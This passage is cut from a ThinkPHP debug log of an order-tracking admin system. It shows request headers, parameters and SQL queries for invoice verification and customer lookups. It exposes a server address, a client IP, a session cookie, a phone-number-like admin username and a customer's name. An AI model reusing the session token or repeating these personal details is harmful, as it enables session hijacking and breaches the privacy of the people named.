AND `outboundandorder`.`verify_status` = 0 AND `outbound`.`factorymge_id` = '40' GROUP BY `outbound`.`id` ORDER BY `outbound`.`id` DESC ) `_group_count_` LIMIT 1 [ RunTime:0.021634s ] [ sql ] [ SQL ] SELECT `outbound`.`id`,`outbound`.`number`,`outbound`.`kehu_id`,`outbound`.`total_money`,`outbound`.`buildstaff_id`,`outbound`.`staffinfo_id`,`outbound`.`factorymge_id`,`outbound`.`complete_status`,`outbound`.`admin_id`,`outbound`.`is_print`,`outbound`.`createtime`,`outbound`.`updatetime`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,outboundandorder.id AS outboundandorder__id,outboundandorder.outbound_id AS outboundandorder__outbound_id,outboundandorder.orderinfo_id AS outboundandorder__orderinfo_id,outboundandorder.kehu_id AS outboundandorder__kehu_id,outboundandorder.amount AS outboundandorder__amount,outboundandorder.money AS outboundandorder__money,outboundandorder.price AS outboundandorder__price,outboundandorder.productinfo_id AS outboundandorder__productinfo_id,outboundandorder.factorymge_id AS outboundandorder__factorymge_id,outboundandorder.staffinfo_id AS outboundandorder__staffinfo_id,outboundandorder.admin_id AS outboundandorder__admin_id,outboundandorder.createtime AS outboundandorder__createtime,outboundandorder.updatetime AS outboundandorder__updatetime,outboundandorder.verify_status AS outboundandorder__verify_status,outboundandorder.verify_amount AS outboundandorder__verify_amount FROM `ot_outbound` `outbound` LEFT JOIN `ot_factorymge` `factorymge` ON `outbound`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outbound`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_outboundandorder` `outboundandorder` ON `outbound`.`id`=`outboundandorder`.`outbound_id` WHERE `outboundandorder`.`verify_status` = 0 AND ( outbound.createtime > 1763049600 ) AND ( outbound.createtime <= 1765727999 ) AND `outbound`.`factorymge_id` = '40' GROUP BY `outbound`.`id` ORDER BY `outbound`.`id` DESC LIMIT 0,10 [ RunTime:0.022478s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11826 [ RunTime:0.014797s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11825 [ RunTime:0.014615s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11824 [ RunTime:0.014779s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11823 [ RunTime:0.014145s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11822 [ RunTime:0.014346s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11821 [ RunTime:0.014318s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11820 [ RunTime:0.014753s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11819 [ RunTime:0.014383s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11814 [ RunTime:0.014374s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11813 [ RunTime:0.014123s ] --------------------------------------------------------------- [ 2025-12-14T16:55:05+08:00 ] 106.112.204.117 GET /admin/financial/verifybill/hedui/ids/11826?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11826?dialog=1 [运行时间:0.080185s][吞吐率:12.47req/s] [内存消耗:6,632.63kb] [文件加载:89] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001156s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'hedui', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'upgrade-insecure-requests' => '1', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'dialog' => '1', 'ids' => '11826', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001519s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->hedui[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/financial/verifybill/hedui.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'adminid', 6 => 'faccount', 7 => 'shoukuanStatusList', 8 => 'start_time', 9 => 'end_time', 10 => 'total', 11 => 'outbound', 12 => 'rows', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000115s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000530s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000753s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000492s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000599s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001083s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000984s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000400s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.000785s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.000873s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000793s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000623s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.000658s ] [ sql ] [ SQL ] SELECT `outboundandorder`.`id`,`outboundandorder`.`outbound_id`,`outboundandorder`.`orderinfo_id`,`outboundandorder`.`kehu_id`,`outboundandorder`.`amount`,`outboundandorder`.`money`,`outboundandorder`.`price`,`outboundandorder`.`productinfo_id`,`outboundandorder`.`factorymge_id`,`outboundandorder`.`staffinfo_id`,`outboundandorder`.`admin_id`,`outboundandorder`.`createtime`,`outboundandorder`.`updatetime`,`outboundandorder`.`verify_status`,`outboundandorder`.`verify_amount`,orderinfo.id AS orderinfo__id,orderinfo.nei_number AS orderinfo__nei_number,orderinfo.number AS orderinfo__number,orderinfo.pid AS orderinfo__pid,orderinfo.order_company AS orderinfo__order_company,orderinfo.order_connect AS orderinfo__order_connect,orderinfo.order_phone AS orderinfo__order_phone,orderinfo.kehu_id AS orderinfo__kehu_id,orderinfo.price AS orderinfo__price,orderinfo.material_id AS orderinfo__material_id,orderinfo.pProductinfo_id AS orderinfo__pProductinfo_id,orderinfo.productinfo_id AS orderinfo__productinfo_id,orderinfo.order_type AS orderinfo__order_type,orderinfo.order_status AS orderinfo__order_status,orderinfo.all_order_status AS orderinfo__all_order_status,orderinfo.shengchan_status AS orderinfo__shengchan_status,orderinfo.zuixinshuoming AS orderinfo__zuixinshuoming,orderinfo.guzhangshu AS orderinfo__guzhangshu,orderinfo.zuixinguzhang AS orderinfo__zuixinguzhang,orderinfo.techprocess_id AS orderinfo__techprocess_id,orderinfo.actual_amount AS orderinfo__actual_amount,orderinfo.kucun_amount AS orderinfo__kucun_amount,orderinfo.produce_amount AS orderinfo__produce_amount,orderinfo.produced_amount AS orderinfo__produced_amount,orderinfo.waste_amount AS orderinfo__waste_amount,orderinfo.produced_time AS orderinfo__produced_time,orderinfo.send_amount AS orderinfo__send_amount,orderinfo.ruku_posi AS orderinfo__ruku_posi,orderinfo.sent_amount AS orderinfo__sent_amount,orderinfo.out_time AS orderinfo__out_time,orderinfo.build_order_staffid AS orderinfo__build_order_staffid,orderinfo.factorymge_id AS orderinfo__factorymge_id,orderinfo.admin_id AS orderinfo__admin_id,orderinfo.remind_day AS orderinfo__remind_day,orderinfo.build_time AS orderinfo__build_time,orderinfo.end_time AS orderinfo__end_time,orderinfo.responsible_staffinfos AS orderinfo__responsible_staffinfos,orderinfo.responsible_staffinfovars AS orderinfo__responsible_staffinfovars,orderinfo.feedback AS orderinfo__feedback,orderinfo.guoqitime AS orderinfo__guoqitime,orderinfo.guoqi_status AS orderinfo__guoqi_status,orderinfo.put_position AS orderinfo__put_position,orderinfo.createtime AS orderinfo__createtime,orderinfo.updatetime AS orderinfo__updatetime,orderinfo.is_modify AS orderinfo__is_modify,orderinfo.purchaseorder_id AS orderinfo__purchaseorder_id,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,outbound.id AS outbound__id,outbound.number AS outbound__number,outbound.kehu_id AS outbound__kehu_id,outbound.total_money AS outbound__total_money,outbound.buildstaff_id AS outbound__buildstaff_id,outbound.staffinfo_id AS outbound__staffinfo_id,outbound.factorymge_id AS outbound__factorymge_id,outbound.complete_status AS outbound__complete_status,outbound.admin_id AS outbound__admin_id,outbound.is_print AS outbound__is_print,outbound.createtime AS outbound__createtime,outbound.updatetime AS outbound__updatetime FROM `ot_outboundandorder` `outboundandorder` LEFT JOIN `ot_orderinfo` `orderinfo` ON `outboundandorder`.`orderinfo_id`=`orderinfo`.`id` LEFT JOIN `ot_productinfo` `productinfo` ON `outboundandorder`.`productinfo_id`=`productinfo`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outboundandorder`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `outboundandorder`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_outbound` `outbound` ON `outboundandorder`.`outbound_id`=`outbound`.`id` WHERE `outbound`.`id` = '11826' [ RunTime:0.014510s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1105 LIMIT 1 [ RunTime:0.000498s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1106 LIMIT 1 [ RunTime:0.000275s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 2083 LIMIT 1 [ RunTime:0.000257s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1130 LIMIT 1 [ RunTime:0.000246s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 3002 LIMIT 1 [ RunTime:0.000245s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 3003 LIMIT 1 [ RunTime:0.000331s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1022 LIMIT 1 [ RunTime:0.000319s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1021 LIMIT 1 [ RunTime:0.000268s ] [ sql ] [ SQL ] SELECT * FROM `ot_outbound` WHERE `id` = 11826 LIMIT 1 [ RunTime:0.000287s ] --------------------------------------------------------------- [ 2025-12-14T16:55:06+08:00 ] 106.112.204.117 GET /admin/ajax/lang?callback=define&controllername=financial.verifybill&v=1765702505 [ info ] 47.105.33.115:8081/admin/ajax/lang?callback=define&controllername=financial.verifybill&v=1765702505 [运行时间:0.033451s][吞吐率:29.89req/s] [内存消耗:3,850.14kb] [文件加载:71] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000051s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001277s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ajax', 2 => 'lang', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11826?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'callback' => 'define', 'controllername' => 'financial.verifybill', 'v' => '1765702505', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001742s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ajax.php [ info ] [ RUN ] app\admin\controller\Ajax->lang[ /alidata/www/gendan/application/admin/controller/Ajax.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000098s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:55:06+08:00 ] 106.112.204.117 POST /admin/staffmge/kehu/getfackehu [ info ] 47.105.33.115:8081/admin/staffmge/kehu/getfackehu [运行时间:0.048776s][吞吐率:20.50req/s] [内存消耗:5,010.32kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001118s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'staffmge.kehu', 2 => 'getfackehu', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '158', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11826?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'searchTable' => 'tbl', 'searchKey' => 'id', 'searchValue' => '164', 'orderBy' => array ( 0 => array ( 0 => 'name', 1 => 'ASC', ), ), 'showField' => 'name', 'keyField' => 'id', 'keyValue' => '164', 'searchField' => array ( 0 => 'name', ), ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001499s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/staffmge/kehu.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\staffmge\Kehu->getfackehu[ /alidata/www/gendan/application/admin/controller/staffmge/Kehu.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.006378s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000470s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000780s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_kehu` WHERE `id` IN (164) AND ( factorymge_id =40 ) LIMIT 1 [ RunTime:0.000361s ] [ sql ] [ SQL ] SELECT * FROM `ot_kehu` WHERE `id` IN (164) AND ( factorymge_id =40 ) ORDER BY `name` ASC LIMIT 0,20 [ RunTime:0.000264s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.000700s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"searchTable\":\"tbl\",\"searchKey\":\"id\",\"searchValue\":\"164\",\"orderBy\":[[\"name\",\"ASC\"]],\"showField\":\"name\",\"keyField\":\"id\",\"keyValue\":\"164\",\"searchField\":[\"name\"]}' , '/admin/staffmge/kehu/getfackehu' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.204.117' , 1765702506) [ RunTime:0.004668s ] --------------------------------------------------------------- [ 2025-12-14T16:58:58+08:00 ] 106.112.204.117 POST /admin/financial/verifybill/hedui/ids/11826?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11826?dialog=1 [运行时间:0.194679s][吞吐率:5.14req/s] [内存消耗:6,214.48kb] [文件加载:94] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001215s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'hedui', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '1256', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11826?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'dialog' => '1', 'kehu_id' => array ( 0 => '王雷', 1 => '164', ), 'verify_amount' => array ( 0 => '5000', 1 => '5000', 2 => '5376', 3 => '5376', 4 => '3514', 5 => '3514', 6 => '15752', 7 => '12028', ), 'price' => array ( 0 => '2.52', 1 => '0.6000000000', 2 => '1.27', 3 => '0.4000000000', 4 => '3.72', 5 => '1.0000000000', 6 => '0.0400000000', 7 => '0.0400000000', ), 'money' => array ( 0 => '12600', 1 => '3000.0000000000', 2 => '6827.52', 3 => '2150.4000000000', 4 => '13072.08', 5 => '3514.0000000000', 6 => '630.0800000000', 7 => '481.1200000000', ), 'explain' => array ( 0 => '100W-1底壳5000个', 1 => '100W-1上盖5000个', 2 => '20W-4底壳1.0厚5376个', 3 => '20W-5锌盖5376个', 4 => '小400W底壳3514个', 5 => '小400W上盖3514个', 6 => '大弯压板15752个', 7 => '大平压板12028个', ), 'shoukuan_status-1' => '0', 'shoukuan_status-2' => '0', 'shoukuan_status-3' => '0', 'shoukuan_status-4' => '0', 'shoukuan_status-5' => '0', 'shoukuan_status-6' => '0', 'shoukuan_status-7' => '0', 'shoukuan_status-8' => '0', 'ids' => '11826', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001481s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->hedui[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.008859s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000436s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000765s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000419s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000570s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.000939s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000640s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000260s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.000803s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.000911s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000690s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000600s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.000626s ] [ sql ] [ SQL ] SELECT `outboundandorder`.`id`,`outboundandorder`.`outbound_id`,`outboundandorder`.`orderinfo_id`,`outboundandorder`.`kehu_id`,`outboundandorder`.`amount`,`outboundandorder`.`money`,`outboundandorder`.`price`,`outboundandorder`.`productinfo_id`,`outboundandorder`.`factorymge_id`,`outboundandorder`.`staffinfo_id`,`outboundandorder`.`admin_id`,`outboundandorder`.`createtime`,`outboundandorder`.`updatetime`,`outboundandorder`.`verify_status`,`outboundandorder`.`verify_amount`,orderinfo.id AS orderinfo__id,orderinfo.nei_number AS orderinfo__nei_number,orderinfo.number AS orderinfo__number,orderinfo.pid AS orderinfo__pid,orderinfo.order_company AS orderinfo__order_company,orderinfo.order_connect AS orderinfo__order_connect,orderinfo.order_phone AS orderinfo__order_phone,orderinfo.kehu_id AS orderinfo__kehu_id,orderinfo.price AS orderinfo__price,orderinfo.material_id AS orderinfo__material_id,orderinfo.pProductinfo_id AS orderinfo__pProductinfo_id,orderinfo.productinfo_id AS orderinfo__productinfo_id,orderinfo.order_type AS orderinfo__order_type,orderinfo.order_status AS orderinfo__order_status,orderinfo.all_order_status AS orderinfo__all_order_status,orderinfo.shengchan_status AS orderinfo__shengchan_status,orderinfo.zuixinshuoming AS orderinfo__zuixinshuoming,orderinfo.guzhangshu AS orderinfo__guzhangshu,orderinfo.zuixinguzhang AS orderinfo__zuixinguzhang,orderinfo.techprocess_id AS orderinfo__techprocess_id,orderinfo.actual_amount AS orderinfo__actual_amount,orderinfo.kucun_amount AS orderinfo__kucun_amount,orderinfo.produce_amount AS orderinfo__produce_amount,orderinfo.produced_amount AS orderinfo__produced_amount,orderinfo.waste_amount AS orderinfo__waste_amount,orderinfo.produced_time AS orderinfo__produced_time,orderinfo.send_amount AS orderinfo__send_amount,orderinfo.ruku_posi AS orderinfo__ruku_posi,orderinfo.sent_amount AS orderinfo__sent_amount,orderinfo.out_time AS orderinfo__out_time,orderinfo.build_order_staffid AS orderinfo__build_order_staffid,orderinfo.factorymge_id AS orderinfo__factorymge_id,orderinfo.admin_id AS orderinfo__admin_id,orderinfo.remind_day AS orderinfo__remind_day,orderinfo.build_time AS orderinfo__build_time,orderinfo.end_time AS orderinfo__end_time,orderinfo.responsible_staffinfos AS orderinfo__responsible_staffinfos,orderinfo.responsible_staffinfovars AS orderinfo__responsible_staffinfovars,orderinfo.feedback AS orderinfo__feedback,orderinfo.guoqitime AS orderinfo__guoqitime,orderinfo.guoqi_status AS orderinfo__guoqi_status,orderinfo.put_position AS orderinfo__put_position,orderinfo.createtime AS orderinfo__createtime,orderinfo.updatetime AS orderinfo__updatetime,orderinfo.is_modify AS orderinfo__is_modify,orderinfo.purchaseorder_id AS orderinfo__purchaseorder_id,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS 